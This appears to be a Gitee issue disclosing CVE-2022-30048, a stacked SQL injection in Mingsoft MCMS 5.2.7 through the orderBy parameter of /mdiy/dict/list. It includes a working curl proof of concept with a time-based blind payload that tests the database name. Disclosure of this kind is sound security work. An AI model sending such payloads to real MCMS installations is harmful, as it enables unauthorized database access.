Headline
CVE-2022-30048: Mingsoft MCMS v5.2.7 SQL注入【前台】 · Issue #I54VG0 · 铭飞/MCMS - Gitee.com
Mingsoft MCMS 5.2.7 was discovered to contain a SQL injection vulnerability in /mdiy/dict/list URI via orderBy parameter.
/mdiy/dict/list路由的orderBy参数存在堆叠SQL注入
证明
curl -w "%{time_total}\n" -i -I -X $'GET' $'http://127.0.0.1:8080/mdiy/dict/list?dictType=1&orderBy=1)a;select/**/if(substring((select/**/database()),1,4)=\'mcms\',sleep(3),1);'